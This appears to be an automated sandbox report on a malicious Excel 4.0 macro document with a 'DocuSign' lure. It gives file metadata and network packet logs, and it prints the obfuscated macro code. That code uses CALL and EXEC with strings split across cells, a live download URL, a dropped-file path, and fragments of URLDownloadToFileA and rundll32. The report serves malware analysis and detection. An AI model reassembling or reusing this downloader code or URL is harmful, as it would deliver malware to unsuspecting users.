SSDEEP: | 6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt |
File Content Preview: | ........................>.......................'..........................."...#...$...%...&.................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "446446.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-12 14:51:16 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.335261663834 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.244430475899 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 270942 |
Entropy: | 3.18416886572 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 12, 2021 17:12:28.653486967 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:28.784665108 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:28.784779072 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:28.785401106 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:28.917207003 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014661074 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014681101 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014695883 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014713049 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014733076 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014750004 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014761925 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014777899 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014792919 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014806032 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.014842987 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014863014 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.014890909 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145554066 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145584106 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145602942 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145623922 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145641088 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145643950 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145657063 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145673037 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145680904 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145692110 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145713091 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145734072 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145735979 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145757914 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145766020 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145804882 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.148679972 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.148780107 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276376009 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276417971 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276442051 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276468039 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276492119 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276515007 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276537895 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276536942 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276561975 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276627064 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276638031 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276653051 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276667118 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276671886 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276699066 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276706934 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276722908 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276746988 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276750088 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276770115 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276782036 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276793003 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276819944 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276882887 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.279459953 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.279510975 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.279628038 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407495022 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407525063 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407536983 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407556057 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407571077 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407589912 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407612085 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407629967 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407644033 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407645941 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407663107 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407679081 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407695055 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407696009 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407711029 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407728910 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407730103 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407747030 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407751083 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407762051 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407778978 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407790899 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407794952 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407809973 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407821894 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407824993 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407840967 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407847881 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407859087 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407866955 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407876015 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407891989 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407901049 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407936096 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.410192966 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.410219908 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.410233021 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 12, 2021 17:12:10.166270971 CEST | 60985 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:10.235234022 CEST | 53 | 60985 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:10.572501898 CEST | 50200 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:10.623192072 CEST | 53 | 50200 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:10.733810902 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:10.782320976 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:11.487895012 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:11.547650099 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:12.651062012 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:12.701529980 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:13.530662060 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:13.583457947 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:13.958421946 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:14.017302036 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:15.152190924 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:15.200813055 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:16.672051907 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:16.720828056 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:22.697266102 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:22.749782085 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:23.718422890 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:23.776175022 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:24.196566105 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:24.269213915 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:24.703171968 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:24.751795053 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:25.206665039 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:25.264100075 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:26.223649025 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:26.280659914 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:28.237773895 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:28.308604002 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:28.505542040 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:28.568959951 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:28.629479885 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:28.651699066 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:32.346003056 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:32.403481007 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:35.646430969 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:35.698082924 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:38.445791006 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:38.508009911 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:39.241060019 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:39.289609909 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:40.090028048 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:40.141598940 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:40.962084055 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:41.013605118 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:42.102891922 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:42.151520967 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:43.337145090 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:43.385710955 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:44.546957970 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:44.595709085 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:45.138573885 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:45.200107098 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:45.863009930 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 12, 2021 17:12:45.916146040 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Apr 12, 2021 17:12:47.034605026 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
